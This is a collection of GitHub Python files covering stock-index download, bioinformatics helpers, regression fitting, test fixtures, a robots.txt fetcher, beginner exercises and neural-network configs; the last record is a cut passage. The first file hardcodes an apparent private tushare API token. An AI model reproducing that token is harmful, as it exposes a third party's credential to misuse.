+{"seq_id":"30283914507","text":"# import tushare\nimport tushare as ts\n\n# initialize the pro API\npro = ts.pro_api('ca0af3044cc38461f8e4ae128c9edabc12bcab9f4628f5cf6b6d863a')\n\n# pull the data\ndf = pro.index_global(**{\n    \"ts_code\": \"\",\n    \"trade_date\": \"\",\n    \"start_date\": \"\",\n    \"end_date\": \"\",\n    \"limit\": \"\",\n    \"offset\": \"\"\n}, fields=[\n    \"ts_code\",\n    \"trade_date\",\n    \"open\",\n    \"close\",\n    \"high\",\n    \"low\",\n    \"pre_close\",\n    \"change\",\n    \"pct_chg\",\n    \"swing\",\n    \"vol\"\n])\nprint(df)\n\n","repo_name":"fionlei/tushare_data","sub_path":"05-指数/14-国际主要指数.py","file_name":"14-国际主要指数.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"71609606669","text":"import re\nimport subprocess\nimport gzip\nimport os\nimport sys\nimport uuid\nimport shutil\nimport requests\nfrom requests import HTTPError\nfrom tenacity import retry, retry_if_exception_type, stop_after_attempt, wait_fixed\n\n#Todo: download by async: https://hackernoon.com/how-to-speed-up-file-downloads-with-python\ndef get_response(retry_state):\n    print(f\" Maximum number of retries exceeded. {retry_state} \")\n@retry(\n    retry=(\n        retry_if_exception_type(HTTPError) \n    ),\n    stop=stop_after_attempt(5),\n    wait=wait_fixed(30),\n    retry_error_callback=get_response\n)\ndef download_file(url, path, gunzip=False):\n    # If the URL has already been downloaded, we can skip downloading it again.\n    if os.path.exists(path):\n        return path\n\n    if os.path.dirname(path):\n        os.makedirs(os.path.dirname(path), exist_ok=True)\n\n    try:\n        with requests.get(url, stream=True) as resp:\n            resp.raise_for_status()\n\n            # We download to a path in the same directory so we can do an\n            # atomic ``os.rename()`` later -- atomic renames don't work\n            # across filesystem boundaries.\n            tmp_path = f\"{path}.{uuid.uuid4()}.tmp\"\n\n            with open(tmp_path, \"wb\") as out_file:\n                for chunk in resp.iter_content(chunk_size=1000000):\n                    out_file.write(chunk)\n\n    # If something goes wrong, it will probably be retried by tenacity.\n    # Log the exception in case a programming bug has been introduced in\n    # the ``try`` block or there's a persistent error.\n    except Exception as exc:\n        print(exc, file=sys.stderr)\n        raise\n    \n    if gunzip==True and get_compress_type(tmp_path)=='gzip':\n        with gzip.open(tmp_path, 'rb') as f_in:\n            with open(path, 'wb') as f_out:\n                shutil.copyfileobj(f_in, f_out)\n    else:\n        os.rename(tmp_path, path)\n    return path\n\ndef get_compress_type(filepath):\n    with open(filepath, 'rb') as f:\n        first_two_bytes = f.read(2)\n        if first_two_bytes == b'\\x1f\\x8b':\n            return 'gzip'\n    # TODO: fill in for bzip\n\n    # Unknown type\n    return None\n\n\ndef get_open_func(filepath):\n    \"\"\"\n    Determine the compression type (by looking at the first 2 bytes) and return the\n    right open function to open the file\n    Parameters\n    ----------\n    filepath\n\n    Returns\n    -------\n\n    \"\"\"\n    compress_type = get_compress_type(filepath)\n    if compress_type == 'gzip':\n        return gzip.open\n    return open\n\n\ndef valid_id(sid):\n    \"\"\"\n    Check if a string can be a valid id, that is, it may contain only the following characters:\n    - alphanumerical\n    - Underscores\n    - Dot\n    Parameters\n    ----------\n    sid\n\n    Returns\n    -------\n\n    \"\"\"\n    return re.match(r'^[.\\w]+$', sid)\n
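\n\n# A usage sketch for the helpers above (hedged; the URL and paths are hypothetical):\n#\n#   local = download_file(\"https://example.org/ref.fa.gz\", \"data/ref.fa\", gunzip=True)\n#   with get_open_func(local)(local, \"rt\") as handle:\n#       header = handle.readline()\n\n\ndef translate_dna(sequence):\n    \"\"\"\n    :param 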
sequence: (str) a DNA sequence string\n :return: (str) a protein string from the forward reading frame 1\n \"\"\"\n\n codontable = {'ATA': 'I', 'ATC': 'I', 'ATT': 'I', 'ATG': 'M',\n 'ACA': 'T', 'ACC': 'T', 'ACG': 'T', 'ACT': 'T',\n 'AAC': 'N', 'AAT': 'N', 'AAA': 'K', 'AAG': 'K',\n 'AGC': 'S', 'AGT': 'S', 'AGA': 'R', 'AGG': 'R',\n 'CTA': 'L', 'CTC': 'L', 'CTG': 'L', 'CTT': 'L',\n 'CCA': 'P', 'CCC': 'P', 'CCG': 'P', 'CCT': 'P',\n 'CAC': 'H', 'CAT': 'H', 'CAA': 'Q', 'CAG': 'Q',\n 'CGA': 'R', 'CGC': 'R', 'CGG': 'R', 'CGT': 'R',\n 'GTA': 'V', 'GTC': 'V', 'GTG': 'V', 'GTT': 'V',\n 'GCA': 'A', 'GCC': 'A', 'GCG': 'A', 'GCT': 'A',\n 'GAC': 'D', 'GAT': 'D', 'GAA': 'E', 'GAG': 'E',\n 'GGA': 'G', 'GGC': 'G', 'GGG': 'G', 'GGT': 'G',\n 'TCA': 'S', 'TCC': 'S', 'TCG': 'S', 'TCT': 'S',\n 'TTC': 'F', 'TTT': 'F', 'TTA': 'L', 'TTG': 'L',\n 'TAC': 'Y', 'TAT': 'Y', 'TAA': '*', 'TAG': '*',\n 'TGC': 'C', 'TGT': 'C', 'TGA': '*', 'TGG': 'W',\n }\n seq = sequence.upper()\n prot = []\n\n for n in range(0, len(seq), 3):\n if seq[n:n + 3] in codontable:\n residue = codontable[seq[n:n + 3]]\n else:\n residue = \"-\"\n\n prot.append(residue)\n\n return \"\".join(prot)\n\n\ndef software_version(software_list=None):\n # List of known software and their version\n cmd_versions = {\n # Basic\n 'java': 'java -version 2>&1 | head -n 1',\n 'python': 'python --version 2>&1',\n\n # workflow language\n 'cromwell': 'cromwell.sh --version 2>&1',\n\n # Fundamental tools\n 'samtools': 'samtools --version 2>&1| head -n 2 | tr \"\\n\" \" \"',\n 'blast': 'blastn -version 2>&1 | head -n 1',\n\n # Assemblers\n 'spades': 'spades.py -v 2>&1',\n 'skesa': 'skesa --version 2>&1 | tail -1',\n 'shovill': 'shovill --version 2>&1',\n #QC\n 'fastqc':'fastqc -v',\n 'multiqc':'multiqc --version',\n 'quast':'quast -v',\n #taxonomy\n 'kraken2':'kraken2 -v | head -n 1',\n # Annotations\n 'prokka': 'prokka -version 2>&1',\n 'mlst': 'mlst --version 2>&1',\n 'abricate': 'abricate --version 2>&1|tr \"\\n\" \" \" && abricate --list|awk \\'BEGIN{printf(\"| Database: \");}NR>1{printf(\"%s \",$1)}\\'',\n 'snippy': 'snippy --version 2>&1',\n 'amrfinder':'amrfinder --version',\n # Pangenome tools\n 'roary': 'roary --version 2>&1 | tail -n 1',\n 'parsnp': 'parsnp --version 2>&1 | tail -1',\n 'iqtree':'iqtree --version | head -n 1',\n # misc\n 'trimmomatic': 'trimmomatic -version 2>&1',\n 'isescan':'isescan.py --version',\n\n # Others:\n 'nodejs':'node --version 2>&1 | tail -1'\n }\n if software_list is None:\n software_list = cmd_versions.keys()\n\n for sw in software_list:\n if sw in cmd_versions:\n cmd = cmd_versions[sw]\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)\n (output, err) = p.communicate()\n ret = p.wait()\n if ret == 0:\n print('{:12}= {}'.format(sw, output.decode().strip()))\n else:\n print('{:12}= {}'.format(sw, 'NOT FOUND'))\n\n for sw in software_list:\n if sw not in cmd_versions:\n print('Cannot check software version for {}'.format(sw))\ndef copy_file(source_file, dest_dir):\n #try:\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n dest_file = os.path.join(dest_dir, os.path.basename(source_file))\n shutil.copyfile(source_file, dest_file)\n return dest_file\n","repo_name":"amromics/amromics","sub_path":"amromics/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"35469172042","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 24 12:11:59 2021\r\n\r\n@author: 
CLaug\r\n\"\"\"\r\nimport pandas as pd\r\nimport os \r\nimport pickle\r\n\r\n# Import helper functions\r\nfrom model_helpers import perform_regression, regression_output, regression_output_comparison\r\n\r\npath = os.path.abspath(os.path.join(__file__ ,\"../../..\"))\r\n\r\nINPUTFILE = path + \"\\\\data\\\\processed\\\\processed_times.csv\"\r\nOUTPUTFILE = path + \"\\\\models\"\r\n\r\n## Read file to df\r\ndf = pd.read_csv(INPUTFILE, index_col=\"Unnamed: 0\")\r\n\r\n#%% Call the linear regression model\r\n\r\n# First with all predictors\r\ncols_to_drop = []\r\nols_pred1, ols_error1, model1 = perform_regression(df, cols_to_drop)\r\nregression_output(model1)\r\n# p<0.05 so we can conclude that our model performs better than other simpler model\r\n# t-values show that coefficients for month and time change since covid are not significantly different from 0\r\n\r\n# With significant predictors\r\ncols_to_drop = [\"Month\", \"Time (s) change since COVID\"]\r\nols_pred2, ols_error2, model2 = perform_regression(df, cols_to_drop)\r\nregression_output(model2)\r\n\r\n\r\n# Is model2 significantly better than model1?\r\nregression_output_comparison(model1, model2)\r\n# 0.382 < 5.991 so cannot reject the null hypothesis. \r\n# This means the full model and the nested model fit the data equally well. \r\n\r\n\r\n# Remove multicollinear predictors\r\ncols_to_drop = [\"Month\", \"Time (s) change since COVID\", \"Year\"]\r\nols_pred3, ols_error3, model3 = perform_regression(df, cols_to_drop)\r\nregression_output(model3)\r\n# All coefficients are signifcant\r\n\r\n# Is model3 significantly better than model1?\r\nregression_output_comparison(model1, model3)\r\n# 55.78>7.815 so can reject the null hypothesis. \r\n# Since model 1 has greater r squared, can conclude that model 1 is significantly better than model 3 at 95% confidence level. \r\n\r\n# Remove non-significant coefficients, as a result of removing year\r\ncols_to_drop = [\"Month\", \"Time (s) change since COVID\", \"Year\", \"Nation\", \"Name\"]\r\nols_pred4, ols_error4, model4 = perform_regression(df, cols_to_drop)\r\nregression_output(model4)\r\n\r\n# Is model4 significantly better than model3?\r\nregression_output_comparison(model3, model4)\r\n# 1759.26>110.89 so can reject the null hypothesis. \r\n# Since model 3 has greater r squared, can conclude that model 3 is significantly better than model 4 at 95% confidence level.\r\n\r\n# Choose model3\r\npickle.dump(model3, open(OUTPUTFILE + \"//linear_model.sav\", 'wb'))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"connorrr81/Swimming-Predictions","sub_path":"src/model/fit_linear_model.py","file_name":"fit_linear_model.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"29159577974","text":"from fixture import DataSet\nfrom .dummy import finance\n\nclass AccountData(DataSet):\n class membership_fee:\n name = u\"Mitgliedsbeiträge\"\n type = \"REVENUE\"\n\n\nclass PropertyGroupData(DataSet):\n class member:\n name = u\"Mitglied\"\n\n class network_access:\n name = u\"Netzwerkanschluss\"\n\n class away:\n # Although there is no `away` group known to the pycroft model\n # anymore, it is needed to test the `reduced_membership_fee`\n # logic. The whole thing is to be removed in the future,\n # anyway. 
See #28 on github.\n name = u\"Ausgezogen, Mail\"\n\n class violation:\n name = u\"Verstoß\"\n\n class cache:\n name = \"Cache\"\n\n class traffic_limit_exceeded:\n name = u\"Trafficlimit überschritten\"\n\n class payment_in_default:\n name = u\"Zahlungsrückstand\"\n\n class external:\n name = u\"Extern\"\n\n\nclass ConfigData(DataSet):\n class config:\n id = 1\n member_group = PropertyGroupData.member\n network_access_group = PropertyGroupData.network_access\n violation_group = PropertyGroupData.violation\n cache_group = PropertyGroupData.cache\n traffic_limit_exceeded_group = PropertyGroupData.traffic_limit_exceeded\n payment_in_default_group = PropertyGroupData.payment_in_default\n external_group = PropertyGroupData.external\n membership_fee_account = AccountData.membership_fee\n membership_fee_bank_account = finance.BankAccountData.dummy\n\nclass PropertyData(DataSet):\n class network_access:\n property_group = PropertyGroupData.member\n name = \"network_access\"\n granted = True\n\n class membership_fee:\n property_group = PropertyGroupData.member\n name = \"membership_fee\"\n granted = True\n\n class away:\n property_group = PropertyGroupData.away\n name = \"reduced_membership_fee\"\n granted = True\n\n class violation:\n property_group = PropertyGroupData.violation\n name = \"violation\"\n granted = True\n\n class violation_network_access_deny:\n property_group = PropertyGroupData.violation\n name = \"network_access\"\n granted = False\n\n class cache:\n property_group = PropertyGroupData.cache\n name = \"cache_access\"\n granted = False\n\n class traffic_limit_exceeded:\n property_group = PropertyGroupData.traffic_limit_exceeded\n granted = True\n name = \"traffic_limit_exceeded\"\n\n class payment_in_default:\n property_group = PropertyGroupData.payment_in_default\n name = \"payment_in_default\"\n granted = True\n\n class member:\n property_group = PropertyGroupData.member\n name = \"member\"\n granted = True\n","repo_name":"JuKu/pycroft","sub_path":"tests/fixtures/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"82"} +{"seq_id":"18442687916","text":"\r\n# Robots.txt determines that which pages of a website can a crawler crawl or not . 
\r\n# If the URL does not already end with \"/\", it appends one, then opens robots.txt,\r\n# wraps the response as UTF-8 text and reads the data\r\n\r\nimport urllib.request\r\nimport io\r\n\r\ndef robot_file(url):\r\n\tif url.endswith(\"/\"):\r\n\t\tpath = url\r\n\telse:\r\n\t\tpath = url + \"/\"\r\n\r\n\treq = urllib.request.urlopen(path + \"robots.txt\", data=None)\r\n\toutput = io.TextIOWrapper(req, encoding=\"UTF-8\")\r\n\tprint(\"Robots.txt is ready .\")\r\n\treturn output.read()\r\n\r\n
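# A stdlib alternative sketch (hedged; example.org is a placeholder URL):\r\n# urllib.robotparser can both fetch and evaluate robots.txt directly.\r\n#\r\n# from urllib.robotparser import RobotFileParser\r\n# rp = RobotFileParser(\"https://example.org/robots.txt\")\r\n# rp.read()\r\n# print(rp.can_fetch(\"*\", \"https://example.org/private/\"))\r\n","repo_name":"Pranav63/Wall-E-of-Websites","sub_path":"robotsTXT.py","file_name":"robotsTXT.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"}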
+{"seq_id":"18443519045","text":"file = open('text.txt', 'r')\nprint(file.read()) # reads the whole text\n\nprint(file.read(4)) # reads 4 characters\n\nprint(file.readline()) # reads the first line\nprint(file.readline())# reads the second line\n\n# OR\n\nfor line in file:\n    print(line)\n\n#----------\n\nfile.close() #close the file when you are done working with it\n\n#----------\n\nfile = open('text.txt', 'a') # append to the file (a = append)\nfile = open('text.txt', 'w') # write to the file (w = write)\nfile = open('text.txt', 'x') # create the file\n\n#----------\n\n#create, write, read\nfile = open('test_1.txt', 'w')\nfile.write('my super text')\nfile.close()\nfile = open('test_1.txt', 'r')\nprint(file.read())\nfile.close()\n\n#----------\n\nwith open('test_1.txt', 'r') as file: # with closes the file by itself\n    print(file.read(4))\n\n#----------\n\nwith open('test_1.log', 'w') as file: # create a log file\n    file.write('my first log file')\n\n#----------\n\nfile = open('texttext.txt', 'w')\nfile.write('this is my texttext',)\nfile.close()\nfile = open('texttext.txt', 'r')\nprint(file.read())\nfile.close()\n\n# or\nwith open('texttext.txt', 'r') as file:\n    print(file.read())\n\n#----------\n\nfile = open('texttexttext.txt', 'w')\nfile.write('Hello, Python! Lesson 7')\nfile.close()\nfile = open('texttexttext.txt', 'r')\nprint(file.read())\nfile.close()\n\nfile = open('texttexttext.txt')\nmy_string = file.read()\nprint(my_string)\nmy_new_string = my_string.replace('e', '0')\nprint(my_new_string)\nfile.close()\nfile = open('texttexttext.txt', 'w')\nfile.write(my_new_string)\nfile.close()\n\n#----------\n\nmy_file = open('text.txt','r')\n\nprint(my_file.read())\nprint(my_file.readline())\nprint(my_file.readline())\n\nprint(my_file.readlines())\nprint(my_file.readline(3)) # 3 characters\nprint(my_file.read(3))\n\nfor i in my_file:\n    print(i)\n\nmy_file.close()\n\n#----------\n\nmy_file = open('text2.txt', \"a\") # a = append: adds to the end of the file.\nmy_file.write('\\n my 3 text')\nmy_file.close()\nmy_file = open('text2.txt', 'r')\nprint(my_file.read())\nmy_file.close()\n\n#----------\n\nmy_file = open('text3.txt', 'x') #x creates the file\nmy_file.write('some text')\nmy_file.close()\nmy_file = open('text3.txt', 'r')\nprint(my_file.read())\nmy_file.close()\n\n#----------\n\nimport os #delete a file\n\nmy_file = open('text4.txt', \"a\")\nmy_file.write('\\n my 3 text')\nmy_file.close()\nmy_file = open('text4.txt', 'r')\nprint(my_file.read())\nmy_file.close()\n\nos.remove('text4.txt') #delete the file\n\n#----------\n\n\n","repo_name":"juliadigrigorio/QA_for_Everyone_4","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
+{"seq_id":"26821099197","text":"#Author: Mohit Patel\n#Date: September 29, 2014\n#Purpose: To create a program that will produce various number theories\n#         based on two given inputs.\n#--------------------------------------------------------------------------#\n\n#Author: Mohit Patel\n#Date: September 29, 2014\n#Purpose: To return a valid positive integer in the given range.\n#Parameters: The smallest and largest number outside the range of integers allowed.\n#Return Value: A positive integer within the given range.\n\ndef getPositiveInteger (low = 0, high = 100):\n    \n    blnInRange = False\n    strNumber = input(\"Please enter a positive number in the range \"+str(low)+\" to \"+str(high)+ \": \")\n    while blnInRange == False or strNumber.isdigit() == False:\n        if strNumber.isdigit() == False:\n            print(\"Your number is not a valid integer.\")\n            strNumber = input(\"Please re-enter an appropriate integer in the range \"+str(low)+\" to \"+str(high)+ \": \")\n        elif int(strNumber) < low or int(strNumber) > high:\n            print(\"Your number is outside of the range \" + str(low) + \" to \" + str(high)+\".\")\n            blnInRange = False\n            strNumber = input(\"Please re-enter an appropriate integer in the range \"+str(low)+\" to \"+str(high)+ \": \")\n        else:\n            blnInRange = True\n    number = int(strNumber)\n    return number\n\n#--------------------------------------------------------------------------#\n\n#Author: Mohit Patel \n#Date: September 29, 2014\n#Purpose: To calculate the factorial of the given integer.\n#Parameters: The integer which will have its factorial calculated.\n#Return Value: The factorial of the integer.\n\ndef calcFactorial (integer):\n    \n    count = 1\n    factorial = 1\n    for count in range(1, integer + 1):\n        factorial = factorial * count\n    \n    return factorial\n\n#--------------------------------------------------------------------------#\n\n#Author: Mohit Patel \n#Date: September 29, 2014\n#Purpose: To calculate the amount of permutations in a given pair of integers.\n#Parameters: Two integers.\n#Return Value: 
The amount of permutations of the two integers.\n\ndef calcPermutations (n, r):\n\n#Flips the values of inputs if they are in an incorrect order.\n equalizer = n\n\n if n < r:\n n = r\n r = equalizer\n\n permutation = (calcFactorial(n)) / calcFactorial(n-r)\n\n return permutation\n\n#--------------------------------------------------------------------------#\n\n#Author: Mohit Patel \n#Date: September 29, 2014\n#Purpose: To calculate the amount of combinations in a given pair of integers.\n#Parameters: Two integers.\n#Return Value: The amount of combinations of the two integers.\n\ndef calcCombinations (n, r):\n\n#Flips the values of inputs if they are in an incorrect order.\n equalizer = n\n\n if n < r:\n n = r\n r = equalizer\n \n combinations = calcFactorial(n)/((calcFactorial(r))*(calcFactorial(n-r)))\n\n return combinations\n\n#--------------------------------------------------------------------------#\n\n#Author: Mohit Patel \n#Date: September 29, 2014\n#Purpose: To calculate the greatest common denominator of two given integers.\n#Parameters: Two integers.\n#Return Value: The greatest common denominator of those two integers. \n\ndef calcGCD (m, n):\n\n if n == 0:\n if m == 0:\n return 0\n else:\n return m\n else:\n t = m % n\n while not (t == 0):\n m = n\n n = t\n t = m % n\n return n\n\n#--------------------------------------------------------------------------#\n\n#Author: Mohit Patel \n#Date: September 29, 2014\n#Purpose: To calculate the lowest common multiple of two given integers.\n#Parameters: Two integers.\n#Return Value: The lowest common multiple of those two integers.\n\ndef calcLCM (m,n):\n lcm = 0\n if calcGCD(m,n) == 0:\n return lcm\n else:\n lcm = (m * n) / calcGCD(m, n)\n return int(lcm)\n\n#--------------------------------------------------------------------------#\n\n#Author: Mohit Patel \n#Date: September 29, 2014\n#Purpose: To state if two given numbers are relatively prime.\n#Parameters: Two integers.\n#Return Value: The boolean \"True\" or \"False\".\n\ndef isRelativelyPrime (m,n):\n\n if calcGCD(m,n) == 1:\n prime = True\n else:\n prime = False\n return prime\n\n#--------------------------------------------------------------------------#\n\n#Main.\nagain = \"Y\"\nlow = 0\nhigh = 100\n\n#Re-executes program.\nwhile again == \"y\" or again == \"Y\":\n\n # Returns two valid integers.\n print(\"Enter your first positive integer.\")\n integer1 = getPositiveInteger(low,high)\n print(\"Now, enter a second positive integer.\")\n integer2 = getPositiveInteger(low,high)\n\n print()\n print()\n print(\"The amount of permutations of this pair of integers is\", str(calcPermutations(integer1, integer2))+\".\")\n print(\"The amount of combinations of this pair of integers is\", str(calcCombinations(integer1,integer2))+\".\")\n #Ensures no GCD of 0.\n if calcGCD(integer1, integer2) == 0:\n print(\"The GCD of these numbers is undefined.\")\n else:\n print(\"The GCD of these numbers is\", str(calcGCD(integer1,integer2))+\".\")\n print(\"The LCM of these numbers is\", str(calcLCM(integer1,integer2))+\".\")\n if isRelativelyPrime(integer1, integer2) == True:\n print(\"These numbers are also relatively prime!\")\n print()\n print()\n\n again = input(\"Would you like to calculate another pair of numbers? (Y/N):\")\n while not(again == \"Y\" or again == \"y\" or again == \"N\" or again == \"n\"):\n again = input(\"Please re-enter if you would like to calculate another pair of numbers. 
(Y/N):\")\n \nprint(\"Have a nice day!\")\n","repo_name":"omnivaliant/High-School-Coding-Projects","sub_path":"ICS3U1/Assignment #3 Functions/Number Theory.py","file_name":"Number Theory.py","file_ext":"py","file_size_in_byte":6543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"35932341708","text":"def sumprime(min,max):\n sum=0\n for i in range(min,max):\n if i>1:\n for j in range(2,i):\n if i%j==0:\n break\n else:\n sum=sum+i\n return(sum)\nprint(sumprime(1,10))","repo_name":"akhilakr06/pythonluminar","sub_path":"Basic_test/min_max.py","file_name":"min_max.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"32260548104","text":"TAKEN_SEAT = \"*\"\nDIRECTIONS = {\n \"A\": (-1, 0), # Above\n \"R\": (0, 1), # Right\n \"L\": (0, -1), # Left\n \"B\": (1, 0), # Below\n}\n\n\ndef get_cinema_layout(cinema_layout):\n # list of strings -> nested list\n return [list(line) for line in cinema_layout]\n\n\ndef get_friends_relative_positions(friends_configuration):\n # create dict and add center name's position\n center_friend = friends_configuration.pop(0)\n dd = {center_friend: (0, 0)}\n for config in friends_configuration:\n name_to_write, direction, name_to_check = config\n # sum the elements of tuples: (delta_x + previous_x, delta_y + previous_y)\n # and write the position for the given name related to the center name\n zip_direction_to_position = zip(DIRECTIONS[direction], dd.get(name_to_check))\n calc_position = map(sum, zip_direction_to_position)\n dd[name_to_write] = tuple(calc_position)\n return dd\n\n\ndef is_invalid_position(mat, r, c):\n max_r = len(mat) - 1\n max_c = len(mat[0]) - 1\n return any((r > max_r, c > max_c, r < 0, c < 0))\n\n\ndef place_names_in_matrix(cinema, deltas, row, col):\n new_layout = get_cinema_layout(cinema)\n # iterate through friends relative positions\n for name, (delta_r, delta_c) in deltas.items():\n # calculate new coordinates\n new_r = row + delta_r\n new_c = col + delta_c\n if is_invalid_position(cinema, new_r, new_c):\n return\n if new_layout[new_r][new_c] == TAKEN_SEAT:\n return\n # place name at position if it is valid\n new_layout[new_r][new_c] = name\n # if the iterations are completed this is valid formation\n return new_layout\n\n\ndef stranger_forms(cinema_layout, friends_configuration):\n possible = []\n friends_deltas = get_friends_relative_positions(friends_configuration)\n\n for row_index, row in enumerate(cinema_layout):\n for col_index, element in enumerate(row):\n\n if element == TAKEN_SEAT:\n continue\n\n new_layout = place_names_in_matrix(cinema_layout, friends_deltas, row_index, col_index)\n\n if new_layout is not None:\n # convert list back to string and append the valid formation to the result\n new_layout = [\"\".join(r) for r in new_layout]\n possible.append(new_layout)\n\n return possible\n\n\n# ____TEST____\ntest_cinema_layout = [\n '..*...*.**',\n '.....**...',\n '*.*...*..*',\n '.**....*.*',\n '...*..*.*.',\n '.***...*..',\n '*......*.*',\n '.....**..*',\n '..*.*.*..*',\n '***.*.**..',\n]\ntest_friends_configuration = [\"A\", \"BAA\", \"FRA\", \"CAB\", \"DRC\", \"EAD\", \"GLE\"]\npossible_configurations = stranger_forms(test_cinema_layout, test_friends_configuration)\n\nfor configuration in possible_configurations:\n for line in configuration:\n print(line)\n print()\n","repo_name":"ivo-bass/Python-101-Forever","sub_path":"C01/C01P19 - Stranger 
forms/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"82"} +{"seq_id":"28296324613","text":"from pathlib import Path\n\nfrom hylfm.checkpoint import TrainRunConfig\nfrom hylfm.hylfm_types import DatasetChoice\n\n\ndef get_config_for_old_checkpoint(checkpoint: Path) -> TrainRunConfig:\n dataset = None\n if checkpoint.name in [\n \"v1_checkpoint_498_MS_SSIM=0.9710696664723483.pth\", # heart stat\n \"v1_checkpoint_MSSSIM=0.6722144321961836.pth\",\n \"v1_checkpoint_27500_ms_ssim-scaled=0.8430055000565269.pth\",\n \"v1_checkpoint_37400_ms_ssim-scaled=0.8433429219506003.pth\", # repos/hylfm-net/logs/train/heart/fake_dyn/from_scratch/21-01-12_21-05-48\n \"v1_checkpoint_28200_ms_ssim-scaled=0.8401095325296576.pth\",\n \"v1_checkpoint_37500_ms_ssim-scaled=0.8358002250844782.pth\",\n \"v1_checkpoint_0_ms_ssim-scaled=0.8727825609120455.pth\",\n \"v1_checkpoint_9900_ms_ssim-scaled=0.8582265810533003.pth\",\n \"v1_checkpoint_6600_ms_ssim-scaled=0.9658018271759073.pth\", # refined old stat on fish2 dyn refine\n ]:\n model_config = {\n \"nnum\": 19,\n \"z_out\": 49,\n \"kernel2d\": 3,\n \"c00_2d\": 488,\n \"c01_2d\": 488,\n \"c02_2d\": None,\n \"c03_2d\": None,\n \"c04_2d\": None,\n \"up0_2d\": 244,\n \"c10_2d\": 244,\n \"c11_2d\": None,\n \"c12_2d\": None,\n \"c13_2d\": None,\n \"c14_2d\": None,\n \"up1_2d\": None,\n \"c20_2d\": None,\n \"c21_2d\": None,\n \"c22_2d\": None,\n \"c23_2d\": None,\n \"c24_2d\": None,\n \"up2_2d\": None,\n \"c30_2d\": None,\n \"c31_2d\": None,\n \"c32_2d\": None,\n \"c33_2d\": None,\n \"c34_2d\": None,\n \"last_kernel2d\": 1,\n \"cin_3d\": 7,\n \"kernel3d\": 3,\n \"c00_3d\": 7,\n \"c01_3d\": None,\n \"c02_3d\": None,\n \"c03_3d\": None,\n \"c04_3d\": None,\n \"up0_3d\": 7,\n \"c10_3d\": 7,\n \"c11_3d\": 7,\n \"c12_3d\": None,\n \"c13_3d\": None,\n \"c14_3d\": None,\n \"up1_3d\": None,\n \"c20_3d\": None,\n \"c21_3d\": None,\n \"c22_3d\": None,\n \"c23_3d\": None,\n \"c24_3d\": None,\n \"up2_3d\": None,\n \"c30_3d\": None,\n \"c31_3d\": None,\n \"c32_3d\": None,\n \"c33_3d\": None,\n \"c34_3d\": None,\n \"init_fn\": \"xavier_uniform\",\n \"final_activation\": None,\n }\n elif checkpoint.name in [\n \"v1_checkpoint_SmoothL1Loss=-0.00012947025970788673.pth\",\n \"small_beads_v1_weights_SmoothL1Loss%3D-0.00012947025970788673.pth\",\n ]: # beads f8\n dataset = DatasetChoice.beads_highc_a\n model_config = {\n \"nnum\": 19,\n \"z_out\": 51,\n \"kernel2d\": 3,\n \"c00_2d\": 976,\n \"c01_2d\": 976,\n \"c02_2d\": None,\n \"c03_2d\": None,\n \"c04_2d\": None,\n \"up0_2d\": 488,\n \"c10_2d\": 488,\n \"c11_2d\": None,\n \"c12_2d\": None,\n \"c13_2d\": None,\n \"c14_2d\": None,\n \"up1_2d\": 244,\n \"c20_2d\": 244,\n \"c21_2d\": None,\n \"c22_2d\": None,\n \"c23_2d\": None,\n \"c24_2d\": None,\n \"up2_2d\": None,\n \"c30_2d\": None,\n \"c31_2d\": None,\n \"c32_2d\": None,\n \"c33_2d\": None,\n \"c34_2d\": None,\n \"last_kernel2d\": 1,\n \"cin_3d\": 7,\n \"kernel3d\": 3,\n \"c00_3d\": 7,\n \"c01_3d\": None,\n \"c02_3d\": None,\n \"c03_3d\": None,\n \"c04_3d\": None,\n \"up0_3d\": 7,\n \"c10_3d\": 7,\n \"c11_3d\": 7,\n \"c12_3d\": None,\n \"c13_3d\": None,\n \"c14_3d\": None,\n \"up1_3d\": None,\n \"c20_3d\": None,\n \"c21_3d\": None,\n \"c22_3d\": None,\n \"c23_3d\": None,\n \"c24_3d\": None,\n \"up2_3d\": None,\n \"c30_3d\": None,\n \"c31_3d\": None,\n \"c32_3d\": None,\n \"c33_3d\": None,\n \"c34_3d\": None,\n \"init_fn\": \"xavier_uniform\",\n 
